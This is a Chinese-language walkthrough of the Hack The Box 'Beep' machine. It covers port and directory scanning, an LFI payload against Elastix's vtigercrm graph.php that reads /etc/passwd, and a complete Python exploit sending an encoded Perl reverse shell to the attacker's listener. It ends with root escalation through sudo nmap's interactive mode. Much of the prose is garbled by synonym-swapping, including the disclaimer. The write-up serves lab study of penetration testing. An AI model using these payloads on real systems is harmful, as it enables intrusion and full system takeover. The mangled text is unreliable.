共计 8137 个字符,预计需要花费 21 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(root💀kali)-[~/htb/Beep]
└─# nmap -sV -Pn 10.10.10.7 -p- 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-09 01:07 EST
Nmap scan report for 10.10.10.7
Host is up (0.33s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp open ssl/https?
879/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1565.01 seconds
开了好多端口,事实当中端口越多破绽越多,然而具体到这些靶机,很可能意味着很多兔子洞,所以枚举的时候肯定要小心分辨
先用 gobuster 爆破 80 端口目录看看,须要次要要加 -k 跳过 ssl 验证
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -k -u https://10.10.10.7/ --wildcard
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.7/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/09 02:53:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 282]
/.htaccess (Status: 403) [Size: 287]
/.htpasswd (Status: 403) [Size: 287]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/ (Status: 403) [Size: 286]
Progress: 1041 / 4686 (22.22%) [ERROR] 2021/12/09 02:56:30 [!] Get "https://10.10.10.7/certs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico (Status: 200) [Size: 894]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/index.php (Status: 200) [Size: 1785]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/robots.txt (Status: 200) [Size: 28]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
Progress: 3959 / 4686 (84.49%) [ERROR] 2021/12/09 03:02:55 [!] Get "https://10.10.10.7/status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 3986 / 4686 (85.06%) [ERROR] 2021/12/09 03:03:04 [!] Get "https://10.10.10.7/style_captcha": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 4036 / 4686 (86.13%) [ERROR] 2021/12/09 03:03:19 [!] Get "https://10.10.10.7/swfobject.js": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
80 端口的服务跑着一个叫 elastix 的 cms,谷歌了一下这个 cms 存在一个 LFI 破绽, 参考这个 exp
验证 POC 如下
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action页面打印
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus
IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.ok, 验证破绽存在。由下面打印可知存在用户:asterisk,spamfilter,fanis
用上面 payload 能够读到 user.txt
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&actionLFI 个别要联合上传破绽或者文件解析破绽能力拿到 webshell
然而我找了一大圈一是没有找到上传入口,二是我找不到 apache 的 access_log 文件
初始 shell
而后持续搜寻这个 cms 的利用破绽,发现还存在一个 rce,在 github 上找到这个利用脚本
不过这个脚本我本地执行时要加上这两行:
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')不然可能会报 ssl 谬误
残缺 exp 如下:
#exploit modified by infosecjunky
#https://infosecjunky.com
import urllib2
import ssl
rhost="10.10.10.7"
lhost="10.10.14.16"
lport=4444
extension="233"
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_ciphers('HIGH:!DH:!aNULL')
ctx.set_ciphers('DEFAULT@SECLEVEL=1')
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib2.urlopen(url,context=ctx)拿到 webshell
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.7] 49229
id
uid=100(asterisk) gid=101(asterisk)
whoami
asterisk
提权
python 切换 tty
python -c ‘import pty; pty.spawn(“/bin/sh”)’
查看 sudo 特权
sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
开了好多权限,抉择 nmap 提权到 root
sh-3.2$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactive
Starting Nmap V. 4.11 (http://www.insecure.org/nmap/)
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# whoami
whoami
root
sh-3.2#
总结
很简略的靶机,初始 shell 那里花了些功夫,找了良久 access.log
root 当前发现在这个地位:
sh-3.2# find / -name access_log
find / -name access_log
/var/log/httpd/access_log而后 web 账号是没有读权限的
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk)
sh-3.2$ cat /var/log/httpd/access_log
cat /var/log/httpd/access_log
cat: /var/log/httpd/access_log: Permission denied要留神这些兔子洞。
正文完
